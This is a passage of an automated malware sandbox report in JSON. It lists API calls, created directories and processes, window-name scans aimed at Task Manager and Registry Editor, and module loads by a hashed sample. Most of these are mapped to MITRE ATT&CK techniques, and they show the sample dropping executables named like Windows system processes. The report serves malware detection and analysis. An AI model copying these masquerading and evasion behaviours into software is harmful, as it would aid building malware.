\"SMSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005196)\n \"SMSS.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"110012009e282876@CRYPTBASE.dll\"\n \"15001600c03eb46c@ADVAPI32.dll\"\n \"0e000f00703fb46c@ADVAPI32.dll\"\n \"0e000f00cc3fb46c@ADVAPI32.dll\"\n \"11001200b447b46c@ADVAPI32.dll\"\n \"110012004848b46c@ADVAPI32.dll\"\n \"120013008c48b46c@ADVAPI32.dll\"\n \"12001300e448b46c@ADVAPI32.dll\"\n \"14001500dc6fb46c@ADVAPI32.dll\"\n \"14001500f46fb46c@ADVAPI32.dll\"\n \"140015000c70b46c@ADVAPI32.dll\"\n \"170018002470b46c@ADVAPI32.dll\"\n \"0d000e003c70b46c@ADVAPI32.dll\"\n \"110012004c70b46c@ADVAPI32.dll\"\n \"110012006070b46c@ADVAPI32.dll\"\n \"0f001000a071b46c@ADVAPI32.dll\"\n \"14001500e071b46c@ADVAPI32.dll\"\n \"14001500f871b46c@ADVAPI32.dll\"\n \"0c000d004072b46c@ADVAPI32.dll\"\n \"0c000d005072b46c@ADVAPI32.dll\"\n \"0e000f006072b46c@ADVAPI32.dll\"\n \"0e000f007072b46c@ADVAPI32.dll\"\n \"0b000c008072b46c@ADVAPI32.dll\"\n \"18001900b874b46c@RPCRT4.dll\"\n \"13001400e474b46c@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateDirectoryA\" with parameter C:\\\\XK (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\XK (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\xk.exe\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005328)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" has an executable section named \".text\"\n \"xk.exe\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"IExplorer.exe\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"Mig2.scr\" has an executable section named \".text\"\n \"WINLOGON.EXE\" has an executable section named \".text\"\n \"CSRSS.EXE\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033\" has an writable section named \".data\"\n \"xk.exe\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"IExplorer.exe\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"Mig2.scr\" has an writable section named \".data\"\n \"WINLOGON.EXE\" has an writable section named \".data\"\n \"CSRSS.EXE\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for class \"ThunderRT6FormDC\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for window \"Windows Task Manager\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for class \"RegEdit_RegEdit\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for window \"Registry Editor\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for window \"Folder Options\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for window \"Local Settings\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" searching for window \"Open With\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712f0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"KERNEL32\" at base 764b0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc50000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747e0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"SXS.DLL\" at base 75ac0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"DWMAPI.DLL\" at base 749d0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"USER32\" at base 77b40000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"KERNEL32.DLL\" at base 764b0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"SHELL32.DLL\" at base 76cd0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"OLE32.DLL\" at base 76350000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"COMCTL32.DLL\" at base 74a80000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"CLBCATQ.DLL\" at base 76bf0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 748d0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"NTMARTA.DLL\" at base 75020000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 764b0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"SETUPAPI.DLL\" at base 769a0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"RPCRT4.DLL\" at base 761f0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a60000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f20000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b50000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 77c10000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"MPR.DLL\" at base 72310000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"USER32.DLL\" at base 77b40000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DRPROV.DLL\" at base 739f0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTLANMAN.DLL\" at base 738f0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\DAVCLNT.DLL\" at base 73050000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"WKSCLI.DLL\" at base 743c0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"CSCAPI.DLL\" at base 70a20000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"NETUTILS.DLL\" at base 749f0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"SRVCLI.DLL\" at base 757b0000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75f20000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75f20000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 68e60000\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" loaded module \"BROWCLI.DLL\" at base 68f10000\n \"xk.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712f0000\n \"xk.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xk.exe\" loaded module \"KERNEL32\" at base 764b0000\n \"xk.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xk.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747e0000\n \"xk.exe\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"xk.exe\" loaded module \"SXS.DLL\" at base 75ac0000\n \"xk.exe\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"xk.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"xk.exe\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"xk.exe\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"xk.exe\" loaded module \"DWMAPI.DLL\" at base 749d0000\n \"xk.exe\" loaded module \"USER32\" at base 77b40000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712f0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 764b0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc50000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 749d0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 77b40000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75ac0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 77b40000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 749d0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 77b40000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712f0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 764b0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75ac0000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 77b40000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712f0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 764b0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc50000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75ac0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 77b40000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747e0000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77c10000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75ac0000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 755c0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75350000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 76b40000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75ab0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 749d0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 77b40000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter mpr.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\drprov.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\ntlanman.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\davclnt.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005328)\n \"xk.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003688)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005180)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 